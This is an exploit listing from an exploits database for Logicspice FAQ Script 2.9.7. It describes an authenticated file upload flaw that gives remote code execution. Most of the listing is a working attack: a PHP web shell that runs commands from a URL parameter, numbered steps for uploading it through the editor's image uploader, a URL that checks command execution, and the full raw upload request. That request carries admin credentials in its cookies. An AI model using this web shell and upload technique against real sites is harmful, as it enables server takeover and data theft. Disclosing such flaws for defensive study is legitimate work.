[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Logicspice FAQ Script 2.9.7 - Remote Code Execution Vulnerability

Author
AkkuS
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-31032
Category
web applications
Date add
04-09-2018
Platform
php
# Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.logicspice.com/products/faq-script
# Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip
# Version: 2.9.7
# Category: Webapps
# Tested on: Kali linux
 
# Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which 
# leads to a remote command execution on the remote server.
 
# 1) Create a file with the below PHP code and save it as .php
 
<?php $cmd=$_GET['cmd']; system($cmd); ?>
 
# 2) Login to FAQ Script admin portal as priviliage user
# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
# 4) Click at the Actions button of a current FAQ product --> Edit
# 5) Click (Image) button on Content panel.
# 6) Chose Upload section and browse your .php file.
# 7) Finaly click "Send it to Server". Script will give you a link belong to
# our php file.
# 8) verift the exploit:
# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id
 
# The request:
 
POST
/admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
HTTP/1.1
Host: faq-script.logicspice.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://faq-script.logicspice.com/admin/faqs/edit/eine-frage-fuer-onkel-peter
Cookie: __asc=3c88bfff1659e6148e6168c52d2;
__auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
_gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;
admin_username=logicspice; admin_password=faqscript_admin;
CAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------1036720403269880351068202740
Content-Length: 267
-----------------------------1036720403269880351068202740
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: application/x-php
 
<?php $cmd=$_GET['cmd']; system($cmd); ?>
-----------------------------1036720403269880351068202740--

#  0day.today [2024-12-25]  #